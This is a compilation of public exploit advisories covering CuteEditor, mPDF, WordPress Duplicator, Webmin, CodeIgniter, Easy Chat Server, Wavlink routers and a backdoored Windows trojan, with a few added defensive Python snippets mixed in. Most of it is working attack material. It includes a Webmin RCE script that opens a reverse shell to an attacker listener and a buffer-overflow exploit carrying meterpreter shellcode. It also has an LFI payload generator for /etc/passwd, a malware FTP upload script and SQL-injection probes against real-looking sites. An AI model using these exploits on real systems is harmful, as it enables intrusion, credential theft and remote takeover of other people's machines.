<pre><code># Exploit Title: CuteEditor for PHP 6.6 - Directory Traversal<br /># Google Dork: N/A<br /># Date: November 17th, 2021<br /># Exploit Author: Stefan Hesselman<br /># Vendor Homepage: http://phphtmledit.com/<br /># Software Link: http://phphtmledit.com/download/phphtmledit.zip<br /># Version: 6.6<br /># Tested on: Windows Server 2019<br /># CVE : N/A<br /><br />There is a path traversal vulnerability in the browse template feature in CuteEditor for PHP via the "rename file" option. An attacker with access to CuteEditor functions can write HTML templates to any directory inside the web root.<br /><br />File: /phphtmledit/cuteeditor_files/Dialogs/Include_Security.php, Lines: 109-121<br /><br />Vulnerable code:<br />[SNIP]<br /> function ServerMapPath($input_path,$absolute_path,$virtual_path)<br /> {<br /> if($absolute_path!="")<br /> {<br /> return $absolute_path.str_ireplace($virtual_path,"",$input_path);<br /> }<br /> else<br /> {<br /> if(strtoupper(substr(PHP_OS, 0, 3) === 'WIN'))<br /> { <br />if(empty($_SERVER['DOCUMENT_ROOT']) && !empty($_SERVER['SCRIPT_FILENAME'])) { <br /> $_SERVER['DOCUMENT_ROOT'] = str_replace( '\\', '/', substr($_SERVER['SCRIPT_FILENAME'], 0, 0 - strlen($_SERVER['PHP_SELF'])));<br />} <br />if(empty($_SERVER['DOCUMENT_ROOT']) && !empty($_SERVER['PATH_TRANSLATED'])) { <br /> $_SERVER['DOCUMENT_ROOT'] = str_replace( '\\', '/', substr(str_replace('\\\\', '\\', $_SERVER['PATH_TRANSLATED']), 0, 0 - strlen($_SERVER['PHP_SELF'])));<br />}<br /> return $_SERVER["DOCUMENT_ROOT"].$input_path;<br /> }<br /> else<br /> {<br /> return ucfirst($_SERVER["DOCUMENT_ROOT"]).$input_path; <br /> }<br /> }<br /> }<br />[SNIP]<br /><br />ServerMapPath() takes 3 arguments: $input_path, $absolute_path, and $virtual_path and is used, among others, in the browse_template.php file.<br /><br />File: /phphtmledit/cuteeditor_files/Dialogs/browse_Template.php, Lines: 47-56<br /><br />Vulnerable function (renamefile, line 57):<br />[SNIP]<br />switch 
($action)<br />{<br />[SNIP]<br /> case "renamefile":<br /> rename(ServerMapPath($_GET["filename"],$AbsoluteTemplateGalleryPath,$TemplateGalleryPath),ServerMapPath($_GET["newname"],$AbsoluteTemplateGalleryPath,$TemplateGalleryPath));<br /> print "<script language=\"javascript\">parent.row_click('".$_GET["newname"]."');</script>";<br /> break;<br />[SNIP]<br /><br />$input_path is $_GET["filename"] and is under control of the attacker. If an attacker uploads and renames the HTML template to '..\..\..\poc.html', it becomes:<br /><br />C:\Inetpub\wwwroot\..\..\..\poc.html<br /><br />Final result: writes poc.html to the webroot.<br /><br />STEPS:<br /><br />1. Create a poc.html file (XSS PoC will do).<br /><br /><HTML><br /><title>Path Traversal PoC</title><br /><BODY><br /><h1>PoC</h1><br /><script>alert('directory traversal');</script><br /></BODY><br /></HTML><br /><br />2. Upload poc.html via the "Insert Templates" page using the "Upload files" option.<br />3. Select poc.html and select "Rename File".<br />4. Click on the pencil icon to the right of the poc.html file.<br />5. Rename file to "..\..\..\poc.html".<br />6. Press OK. poc.html is written three directories up.<br /><br />This may require more or less dot dot slash (..\ or ../) depending on the size of your directory tree. Adjust slashes as needed.<br /> <br /><br /></code></pre>
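Added example, written here from the defender's side and not part of the advisory: a Python model of the $absolute_path branch of ServerMapPath() next to a hardened replacement that normalises the joined path and refuses anything that resolves outside the template gallery. The gallery directory C:\Inetpub\wwwroot\templates and the virtual path /templates/ are constructed values standing in for $AbsoluteTemplateGalleryPath and $TemplateGalleryPath; ntpath is used so the Windows semantics hold on any host.

```python
import ntpath
import re

# Constructed for this example: the configured gallery directory and its
# virtual path (the advisory's $AbsoluteTemplateGalleryPath / $TemplateGalleryPath).
GALLERY_ROOT = "C:\\Inetpub\\wwwroot\\templates"
VIRTUAL_ROOT = "/templates/"


def vulnerable_map_path(input_path, absolute_path, virtual_path):
    """Mirror of the $absolute_path branch of ServerMapPath(): strip the
    virtual prefix case-insensitively (str_ireplace) and concatenate.
    No normalisation and no containment check, so '..' survives intact."""
    stripped = re.sub(re.escape(virtual_path), "", input_path, flags=re.IGNORECASE)
    return absolute_path + stripped


def escapes_root(mapped, root):
    """True when the mapped path, once '..' components are resolved,
    no longer lies under root (Windows semantics via ntpath)."""
    resolved = ntpath.normpath(mapped)
    root = ntpath.normpath(root)
    try:
        common = ntpath.commonpath([root, resolved])
    except ValueError:  # different drive letter or UNC share
        return True
    return common.lower() != root.lower()


def safe_map_path(root, requested):
    """Hardened mapping: join, normalise, then verify the result is still
    inside root. Returns None for any name that would escape."""
    # An embedded NUL or a drive/UNC prefix is never a legitimate template
    # name; reject before joining rather than relying on the path library.
    if "\x00" in requested or ntpath.splitdrive(requested)[0]:
        return None
    candidate = ntpath.normpath(ntpath.join(root, requested))
    if escapes_root(candidate, root):
        return None
    return candidate


if __name__ == "__main__":
    for name in ("poc.html", "..\\..\\..\\poc.html", "../poc.html"):
        raw = vulnerable_map_path(name, GALLERY_ROOT + "\\", VIRTUAL_ROOT)
        print(f"{name!r}: vulnerable -> {raw} (escapes={escapes_root(raw, GALLERY_ROOT)}); "
              f"hardened -> {safe_map_path(GALLERY_ROOT, name)}")
```

The same check covers both separator styles the advisory mentions (..\ and ../), because ntpath.normpath collapses either before the containment comparison.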
<pre><code>Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2022<br />Original source: https://malvuln.com/advisory/c790749f851d48e66e7d59cc2e451956.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Backdoor.Win32.Destrukor.20<br />Vulnerability: Authentication Bypass <br />Description: The malware listens on TCP port 6969. However, after sending the specific cmd "rozmiar" the backdoor returns "moznasciagac" (Polish for "you can download") and port 21 opens. Third-party attackers who can reach infected systems can log on using any username/password combination. Intruders may then upload executables using FTP PASV and STOR commands, which can result in remote code execution.<br />Family: Destrukor<br />Type: PE32<br />MD5: c790749f851d48e66e7d59cc2e451956<br />Dropped files: sys32.exe<br />Vuln ID: MVID-2022-0626<br />Disclosure: 07/30/2022<br /><br />Exploit/PoC:<br />C:\>nc64.exe 192.168.18.125 6969<br />rozmiar<br /> moznasciagac<br /><br />C:\>nc64.exe 192.168.18.125 21<br />220 ICS FTP Server ready.<br />USER malvuln<br />331 Password required for malvuln.<br />PASS malvuln<br />230 User malvuln logged in.<br />SYST<br />215 UNIX Type: L8 Internet Component Suite<br />CDUP \<br />250 CWD command successful. 
"C:/" is current directory.<br />MKD HATE<br />257 'C:\HATE': directory created.<br />PASV<br />227 Entering Passive Mode (192,168,18,125,232,131).<br />STOR DOOM.exe<br />150 Opening data connection for DOOM.exe.<br />226 File received ok<br /><br />from socket import *<br /><br />MALWARE_HOST="192.168.18.125"<br />PORT=59523<br />DOOM="DOOM.exe"<br /><br />def doit():<br /> s=socket(AF_INET, SOCK_STREAM)<br /> s.connect((MALWARE_HOST, PORT))<br /><br /> f = open(DOOM, "rb")<br /> EXE = f.read()<br /> s.send(EXE)<br /><br /> while EXE:<br /> s.send(EXE)<br /> EXE=f.read()<br /><br /> s.close()<br /><br /> print("By Malvuln");<br /><br />if __name__=="__main__":<br /> doit()<br /><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
<pre><code># Exploit Title: mPDF 7.0 - Local File Inclusion<br /># Google Dork: N/A<br /># Date: 2022-07-23<br /># Exploit Author: Musyoka Ian<br /># Vendor Homepage: https://mpdf.github.io/<br /># Software Link: https://mpdf.github.io/<br /># Version: CuteNews<br /># Tested on: Ubuntu 20.04, mPDF 7.0.x<br /># CVE: N/A<br /><br />#!/usr/bin/env python3<br /><br />from urllib.parse import quote<br />from cmd import Cmd<br />from base64 import b64encode<br /><br />class Terminal(Cmd):<br /> prompt = "\nFile >> "<br /> def default(self, args):<br /> payload_gen(args)<br />def banner():<br /> banner = """ _____ _____ ______ ______ ___ __ __ _ _ _ <br /> | __ \| __ \| ____| |____ / _ \ \ \ / / | | (_) | <br /> _ __ ___ | |__) | | | | |__ / / | | | \ V / _____ ___ __ | | ___ _| |_ <br /> | '_ ` _ \| ___/| | | | __| / /| | | | > < / _ \ \/ / '_ \| |/ _ \| | __|<br /> | | | | | | | | |__| | | / / | |_| | / . \ | __/> <| |_) | | (_) | | |_ <br /> |_| |_| |_|_| |_____/|_| /_/ (_)___(_)_/ \_\ \___/_/\_\ .__/|_|\___/|_|\__|<br /> | | <br /> |_| """<br /> print(banner)<br />def payload_gen(fname):<br /> payload = f'<annotation file="{fname}" content="{fname}" icon="Graph" title="Attached File: {fname}" pos-x="195" />'<br /> encoded_payload = quote(payload)<br /> print("[+] Replace the content with the payload below")<br /><br /> print(f"Url encoded payload:\n{encoded_payload}\n")<br /> base64enc = b64encode(encoded_payload.encode())<br /> print(f"Base64 encoded payload:\n{base64enc.decode()}\n")<br />if __name__ == ("__main__"):<br /> banner()<br /> print("Enter Filename eg. /etc/passwd")<br /> terminal= Terminal()<br /> terminal.cmdloop()<br /> <br /></code></pre>
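Added example, not part of the advisory and not mPDF's own code: a pre-filter that an application can run over user-supplied HTML before passing it to mPDF. It percent-decodes the input until it is stable (the PoC emits a URL-encoded payload) and then refuses any <annotation> tag carrying a file= attribute, which is the element the advisory abuses to read local files such as /etc/passwd. The sample inputs are constructed from the payload shape in the PoC script.

```python
from html.parser import HTMLParser
from urllib.parse import quote, unquote


class _AnnotationFinder(HTMLParser):
    """Collects the file= attribute of every <annotation> tag, whether
    written as <annotation ...>...</annotation> or self-closing <annotation ... />.
    HTMLParser lower-cases tag and attribute names, so <ANNOTATION FILE=...> is caught too."""

    def __init__(self):
        super().__init__()
        self.file_refs = []

    def handle_starttag(self, tag, attrs):
        if tag != "annotation":
            return
        for name, value in attrs:
            if name == "file" and value:
                self.file_refs.append(value)


def decode_layers(text, max_rounds=3):
    """Undo percent-encoding repeatedly and stop once the text is stable.
    The decoded text is used for inspection only, never for rendering."""
    for _ in range(max_rounds):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    return text


def annotation_files(html):
    """Return every file target referenced by an <annotation> tag in html."""
    finder = _AnnotationFinder()
    finder.feed(decode_layers(html))
    finder.close()
    return finder.file_refs


def is_safe_for_mpdf(html):
    """Gatekeeper: False when any <annotation file=...> reference is present."""
    return not annotation_files(html)


# Constructed sample inputs: the PoC's payload shape for /etc/passwd, once raw
# and once percent-encoded the way the advisory's payload_gen() emits it.
RAW_PAYLOAD = ('<annotation file="/etc/passwd" content="/etc/passwd" icon="Graph" '
               'title="Attached File: /etc/passwd" pos-x="195" />')
ENCODED_PAYLOAD = quote(RAW_PAYLOAD)

if __name__ == "__main__":
    for sample in (RAW_PAYLOAD, ENCODED_PAYLOAD, "<h1>Report</h1><p>Total: 100%</p>"):
        print(f"safe={is_safe_for_mpdf(sample)} refs={annotation_files(sample)}")
```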
<pre><code># Exploit Title: WordPress Plugin Duplicator 1.4.6 - Unauthenticated Backup Download<br /># Google Dork: N/A<br /># Date: 07.27.2022<br /># Exploit Author: SecuriTrust<br /># Vendor Homepage: https://snapcreek.com/<br /># Software Link: https://wordpress.org/plugins/duplicator/<br /># Version: < 1.4.7<br /># Tested on: Linux, Windows<br /># CVE : CVE-2022-2551<br /># Reference: https://securitrust.fr<br /># Reference: https://github.com/SecuriTrust/CVEsLab/CVE-2022-2551<br /><br />#Product:<br />WordPress Plugin Duplicator < 1.4.7<br /><br />#Vulnerability:<br />1-It allows an attacker to download the backup file.<br /><br />#Proof-Of-Concept:<br />1-Backup download.<br />The backup file can be downloaded using the "is_daws" parameter.<br />http://[PATH]/backups-dup-lite/dup-installer/main.installer.php<br /><br /></code></pre>
<pre><code># Exploit Title: WordPress Plugin Duplicator 1.4.7 - Information Disclosure<br /># Google Dork: N/A<br /># Date: 07.27.2022<br /># Exploit Author: SecuriTrust<br /># Vendor Homepage: https://snapcreek.com/<br /># Software Link: https://wordpress.org/plugins/duplicator/<br /># Version: <= 1.4.7<br /># Tested on: Linux, Windows<br /># CVE : CVE-2022-2552<br /># Reference: https://securitrust.fr<br /># Reference: https://github.com/SecuriTrust/CVEsLab/CVE-2022-2552<br /><br />#Product:<br />WordPress Plugin Duplicator <= 1.4.7<br /><br />#Vulnerability:<br />1-Some system information may be disclosed.<br /><br />#Proof-Of-Concept:<br />1-System information.<br />Some system information is obtained using the "view" parameter.<br />http://[PATH]/backups-dup-lite/dup-installer/main.installer.php<br /><br /></code></pre>
<pre><code># Exploit Title: Webmin 1.996 - Remote Code Execution (RCE) (Authenticated)<br /># Date: 2022-07-25<br /># Exploit Author: Emir Polat<br /># Technical analysis: https://medium.com/@emirpolat/cve-2022-36446-webmin-1-997-7a9225af3165<br /># Vendor Homepage: https://www.webmin.com/<br /># Software Link: https://www.webmin.com/download.html<br /># Version: < 1.997<br /># Tested On: Version 1.996 - Ubuntu 20.04.4 LTS (GNU/Linux 5.4.0-122-generic x86_64)<br /># CVE: CVE-2022-36446<br /><br />import argparse<br />import requests<br />from bs4 import BeautifulSoup<br /><br />def login(args):<br /> global session<br /> global sysUser<br /><br /> session = requests.Session()<br /> loginUrl = f"{args.target}:10000/session_login.cgi"<br /> infoUrl = f"{args.target}:10000/sysinfo.cgi"<br /><br /> username = args.username<br /> password = args.password<br /> data = {'user': username, 'pass': password}<br /><br /> login = session.post(loginUrl, verify=False, data=data, cookies={'testing': '1'})<br /> sysInfo = session.post(infoUrl, verify=False, cookies={'sid' : session.cookies['sid']})<br /><br /> bs = BeautifulSoup(sysInfo.text, 'html.parser')<br /> sysUser = [item["data-user"] for item in bs.find_all() if "data-user" in item.attrs]<br /><br /> if sysUser:<br /> return True<br /> else:<br /> return False<br /><br />def exploit(args):<br /> payload = f"""<br /> 1337;$(python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("{args.listenip}",{args.listenport}));<br /> os.dup2(s.fileno(),0);<br /> os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh")');<br /> """<br /><br /> updateUrl = f"{args.target}:10000/package-updates"<br /> exploitUrl = f"{args.target}:10000/package-updates/update.cgi"<br /><br /> exploitData = {'mode' : 'new', 'search' : 'ssh', 'redir' : '', 'redirdesc' : '', 'u' : payload, 'confirm' : 'Install+Now'}<br /><br /> if login(args):<br /> print("[+] Successfully Logged In !")<br /> 
 print(f"[+] Session Cookie => sid={session.cookies['sid']}")<br /> print(f"[+] User Found => {sysUser[0]}")<br /><br /> res = session.get(updateUrl)<br /> bs = BeautifulSoup(res.text, 'html.parser')<br /><br /> updateAccess = [item["data-module"] for item in bs.find_all() if "data-module" in item.attrs]<br /><br /> if updateAccess[0] == "package-updates":<br /> print(f"[+] User '{sysUser[0]}' has permission to access <<Software Package Updates>>")<br /> print(f"[+] Exploit starting ... ")<br /> print(f"[+] Shell will spawn to {args.listenip} via port {args.listenport}")<br /><br /> session.headers.update({'Referer' : f'{args.target}:10000/package-updates/update.cgi?xnavigation=1'})<br /> session.post(exploitUrl, data=exploitData)<br /> else:<br /> print(f"[-] User '{sysUser[0]}' unfortunately has no permission to access <<Software Package Updates>>")<br /> else:<br /> print("[-] Login Failed !")<br /><br />if __name__ == '__main__':<br /> parser = argparse.ArgumentParser(description="Webmin < 1.997 - Remote Code Execution (Authenticated)")<br /> parser.add_argument('-t', '--target', help='Target URL, Ex: https://webmin.localhost', required=True)<br /> parser.add_argument('-u', '--username', help='Username For Login', required=True)<br /> parser.add_argument('-p', '--password', help='Password For Login', required=True)<br /> parser.add_argument('-l', '--listenip', help='Listening address required to receive reverse shell', required=True)<br /> parser.add_argument('-lp','--listenport', help='Listening port required to receive reverse shell', required=True)<br /> parser.add_argument("-s", '--ssl', help="Use if the server supports SSL.", required=False)<br /> args = parser.parse_args()<br /> exploit(args)<br /> <br /></code></pre>
<pre><code>[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]<br />[+] <br />[+]Exploit Title : CodeIgniter CMS Version 4.2.0 SQL Injection Vulnerability <br />[+] <br />[+]Exploit Author : E1.Coders <br />[+] <br />[+]Vendor Homepage : https://www.codeigniter.com/ <br />[+] <br />[+]Google Dork ONE : searchResult/?title=<br />[+] <br />[+]Google Dork Two : Job/searchResult/?title= <br />[+] <br />[+]Date : 15 / 05 / 2022 <br />[+] <br />[+]Tested On : windows + linux <br />[+] <br />[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]<br />[+]~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~> DESCRIPTION <~ ~ ~ <br />[+] <br />[+] CodeIgniter CMS suffers from a remote SQL injection vulnerability. <br />[+] "codeigniter vulnerability ::$DATA view source code"<br />[+] Note that this find contains information about the site.<br />[+] CodeIgniter CMS SQL injection vulnerabilities were found and confirmed in the software as an anonymous user.<br />[+] A successful attack could allow an unknown attacker to access information such as username and password hashes stored in the database.<br />[+] The following URLs and parameters have been confirmed to suffer from SQL injection. 
<br />[+] <br />[+]~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~> Location <~ ~ ~ <br />[+] SQL ERROR Location <br />[+] http://www.site.com/Job/searchResult/?title=[SQL] <br />[+] <br />[+]~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~ ~~ ~ ~~ ~ ~~ ~~~~~~ ~~ ~> DEMO <~ ~ ~ <br />[+]<br />[+]<br />[+] ERROR : https://[removed].com/Job/searchResult/?title=123%27<br />[+]<br />[+] ERROR : https://[removed].com/Job/city/%D8%A7%D8%B3%D8%AA%D8%AE%D8%AF%D8%A7%D9%85-%D9%85%D8%B4%D9%87%D8%AF' (OR= or ==)<br />[+]<br />[+] ERROR : https://[removed].ir/?per_page=400%2<br />[+]<br />[+] ERROR : https://[removed].ir/Job/search/NULL/%D8%A2%D8%A8%D8%A7%D8%AF%D8%A7%D9%86'/NULL/NULL/0<br />[+] <br />[+] ERROR : https://[removed].com/login/ (username = ' Password = ')<br />[+]<br />[+] ERROR : https://[removed].com/search.php?search=1'<br />[+]<br />[+] ERROR : https://[removed].com/news.php?p=7251'<br />[+]<br />[+] ERROR : https://[removed].com/employe/show.php?cvid=14088'<br />[+]<br />[+] ERROR : https://[removed].com/states/%D8%AA%D9%87%D8%B1%D8%A7%D9%86'<br />[+]<br />[+] ERROR : https://[removed].com/fa/index.asp?p=search&search=1<br />[+]<br />[+] ERROR : https://[removed].com/fa/FormView/1026'<br />[+]<br />[+] ERROR : https://[removed].com/fa/formview/1030'<br /> <br />[+] And Google More . . . 
\ .<br />[+]<br />[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]<br />[+]<br />[+] Attack Method :<br />[+] <br />[+] Step 1 : Enter the URL of the page that has the SQL injection problem<br />[+] <br />[+] Step 2 : Add a variable " OR ' to the end of the URL "request"<br />[+] This displays the PHP error caused by the functions that do not control the input the attacker supplies '<br />[+] <br />[+] Step 3 : Use sqlmap: python sqlmap.py -u "https://[removed].com/Job/searchResult/?title=123"<br />[+]<br />[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]<br />[+] <br />[+] About CMS :<br />[+] <br />[+] CodeIgniter is an open source web software framework used to build dynamic websites. <br />[+] This framework, which is written in the PHP language, <br />[+] accelerates the development of software by coding from the beginning. This acceleration is done by the framework's libraries, <br />[+] many of which make common tasks simple. 
The first public release of CodeIgniter was on February 28, 2006.<br />[+]<br />[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]<br />[+] <br />[+] Explanation of vulnerability :<br />[+] <br />[+] The remote attacker can test for SQL injection by injecting a 'variable' and then observing the PHP error caused by the functions that do not control the input that enables the SQL injection attack.<br />[+] The attacker can then execute attacks with SQL injection commands or with ready-made tools such as sqlmap.<br />[+] <br />[+] All different parts of the site have this security problem.<br />[+]<br />[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]<br />[+] <br />[+] Solution :<br />[+] <br />[+] <br />[+] Use parameter input validation, modified to prevent attacks<br />[+] "codeigniter vulnerability ::$DATA view source code"<br />[+] <br />[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]<br /></code></pre>
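Added example to make the advisory's "Solution" concrete; it is not the advisory author's code and not CodeIgniter's. It models the searchResult/?title= lookup with an in-memory SQLite table: one query built by string concatenation, where the advisory's title=123' probe turns into a syntax error and a quoted tautology widens the result set, and one parameterised query where the same input is only ever data. The jobs table and its rows are constructed for the demonstration.

```python
import sqlite3


def make_db():
    """Constructed sample data standing in for the CMS job table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE jobs (id INTEGER PRIMARY KEY, title TEXT)")
    conn.executemany("INSERT INTO jobs (title) VALUES (?)",
                     [("Engineer",), ("123",), ("Analyst 123",)])
    return conn


def search_concatenated(conn, title):
    """The vulnerable shape: the title parameter is spliced into the SQL text,
    so a quote in the input changes the statement's structure."""
    sql = "SELECT id, title FROM jobs WHERE title LIKE '%" + title + "%'"
    return [row[1] for row in conn.execute(sql)]


def search_parameterised(conn, title):
    """The fix: the statement is fixed and the value travels as a bound
    parameter, so a quote in the input is matched literally."""
    sql = "SELECT id, title FROM jobs WHERE title LIKE ?"
    return [row[1] for row in conn.execute(sql, ("%" + title + "%",))]


def probe(conn, title):
    """What the advisory's probe observes on the vulnerable endpoint: either
    ('ok', rows) or ('error', message) when display_errors leaks the failure."""
    try:
        return ("ok", search_concatenated(conn, title))
    except sqlite3.Error as exc:
        return ("error", str(exc))


if __name__ == "__main__":
    db = make_db()
    for value in ("123", "123'", "' OR '1'='1"):
        print(f"title={value!r}: concatenated -> {probe(db, value)}; "
              f"parameterised -> {search_parameterised(db, value)}")
```

In CodeIgniter the same separation is obtained with query bindings, e.g. `$db->query('SELECT ... WHERE title LIKE ?', ["%$title%"])`, or with the Query Builder's `like()` method; input validation on top of that is a defence in depth, not a replacement.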
<pre><code># Exploit Title: Easy Chat Server 3.1 - Remote Stack Buffer Overflow (SEH)<br /># Exploit Author: r00tpgp @ http://www.r00tpgp.com<br /># Usage: python easychat-exploit.py <victim-ip> <port><br /># Spawns reverse meterpreter LHOST=192.168.0.162 LPORT=1990<br /># CVE: CVE-2004-2466 <br /># Installer: http://www.echatserver.com/<br /># Tested on: Microsoft Windows 11 Pro x86-64 (10.0.22000 N/A Build 22000)<br /><br />#!/usr/bin/python<br /><br />import sys, socket, time<br /> <br />host = sys.argv[1] # Receive IP from user<br />port = int(sys.argv[2]) # Receive Port from user<br /> <br />#msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.162 LPORT=1990 -f python -b "\x00\x20"<br />buf = ""<br />buf += "\xbe\x4e\xdd\xd4\x27\xd9\xe9\xd9\x74\x24\xf4\x5b\x29"<br />buf += "\xc9\xb1\x54\x31\x73\x13\x83\xc3\x04\x03\x73\x41\x3f"<br />buf += "\x21\xdb\xb5\x3d\xca\x24\x45\x22\x42\xc1\x74\x62\x30"<br />buf += "\x81\x26\x52\x32\xc7\xca\x19\x16\xfc\x59\x6f\xbf\xf3"<br />buf += "\xea\xda\x99\x3a\xeb\x77\xd9\x5d\x6f\x8a\x0e\xbe\x4e"<br />buf += "\x45\x43\xbf\x97\xb8\xae\xed\x40\xb6\x1d\x02\xe5\x82"<br />buf += "\x9d\xa9\xb5\x03\xa6\x4e\x0d\x25\x87\xc0\x06\x7c\x07"<br />buf += "\xe2\xcb\xf4\x0e\xfc\x08\x30\xd8\x77\xfa\xce\xdb\x51"<br />buf += "\x33\x2e\x77\x9c\xfc\xdd\x89\xd8\x3a\x3e\xfc\x10\x39"<br />buf += "\xc3\x07\xe7\x40\x1f\x8d\xfc\xe2\xd4\x35\xd9\x13\x38"<br />buf += "\xa3\xaa\x1f\xf5\xa7\xf5\x03\x08\x6b\x8e\x3f\x81\x8a"<br />buf += "\x41\xb6\xd1\xa8\x45\x93\x82\xd1\xdc\x79\x64\xed\x3f"<br />buf += "\x22\xd9\x4b\x4b\xce\x0e\xe6\x16\x86\xe3\xcb\xa8\x56"<br />buf += "\x6c\x5b\xda\x64\x33\xf7\x74\xc4\xbc\xd1\x83\x2b\x97"<br />buf += "\xa6\x1c\xd2\x18\xd7\x35\x10\x4c\x87\x2d\xb1\xed\x4c"<br />buf += "\xae\x3e\x38\xf8\xa4\xa8\x03\x55\xb8\x8a\xec\xa4\xb9"<br />buf += "\xcd\x2a\x21\x5f\x81\xe2\x62\xf0\x61\x53\xc3\xa0\x09"<br />buf += "\xb9\xcc\x9f\x29\xc2\x06\x88\xc3\x2d\xff\xe0\x7b\xd7"<br />buf += "\x5a\x7a\x1a\x18\x71\x06\x1c\x92\x70\xf6\xd2\x53\xf0"<br />buf 
+= "\xe4\x02\x02\xfa\xf4\xd2\xaf\xfa\x9e\xd6\x79\xac\x36"<br />buf += "\xd4\x5c\x9a\x98\x27\x8b\x98\xdf\xd7\x4a\xa9\x94\xe1"<br />buf += "\xd8\x95\xc2\x0d\x0d\x16\x13\x5b\x47\x16\x7b\x3b\x33"<br />buf += "\x45\x9e\x44\xee\xf9\x33\xd0\x11\xa8\xe0\x73\x7a\x56"<br />buf += "\xde\xb3\x25\xa9\x35\xc0\x22\x55\xcb\xe4\x8a\x3e\x33"<br />buf += "\xa8\x2a\xbf\x59\x28\x7b\xd7\x96\x07\x74\x17\x56\x82"<br />buf += "\xdd\x3f\xdd\x42\xaf\xde\xe2\x4f\x71\x7f\xe2\x63\xaa"<br />buf += "\x96\x6d\x84\x4d\x97\x8f\xb9\x9b\xae\xe5\xfa\x1f\x95"<br />buf += "\xf6\xb1\x02\xbc\x9c\xb9\x11\xbe\xb4"<br /><br />junk = "A"*217<br />nseh = "\xeb\x06\x90\x90" # short jump 6 bytes<br />seh = "\x86\xae\x01\x10" # pop pop ret 1001AE86 SSLEAY32.DLL<br />nops = "\x90"*16<br /><br />header = (<br /> "GET /chat.ghp?username=" + junk + nseh + seh + nops + buf + "&password=&room=1&sex=1 HTTP/1.1\r\n"<br /> "User-Agent: Mozilla/4.0\r\n"<br /> "Host: 192.168.1.136:80\r\n"<br /> "Accept-Language: en-us\r\n"<br /> "Accept-Encoding: gzip, deflate\r\n"<br /> "Referer: http://192.168.1.136\r\n"<br /> "Connection: Keep-Alive\r\n\r\n"<br /> )<br />client = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # Declare a TCP socket<br />client.connect((host, port)) # Connect to user supplied port and IP address<br />client.send(header) # Send the user command with a variable length name<br />client.close() # Close the Connection<br /> <br /></code></pre>
<pre><code># Exploit Title: Wavlink WN530HG4 - Password Disclosure<br /># Date: 2022-06-12<br /># Exploit Author: Ahmed Alroky<br /># Author Company : AIactive<br /># Version: M30HG4.V5030.191116<br /># Vendor home page : wavlink.com<br /># Authentication Required: No<br /># CVE : CVE-2022-34047<br /># Tested on: Windows<br /><br /># Exploit<br /><br />view-source:http://IP_address/set_safety.shtml?r=52300<br />search for var syspasswd="<br />you will find the username and the password<br /><br /></code></pre>
<pre><code># Exploit Title: Wavlink WN533A8 - Password Disclosure<br /># Date: 2022-06-12<br /># Exploit Author: Ahmed Alroky<br /># Author Company : AIactive<br /># Version: M33A8.V5030.190716<br /># Vendor home page : wavlink.com<br /># Authentication Required: No<br /># CVE : CVE-2022-34046<br /># Tested on: Windows<br /><br /># Exploit<br /><br />view-source:http://IP_ADDRESS/sysinit.shtml<br />search for var syspasswd="<br />you will find the username and the password<br /><br /></code></pre>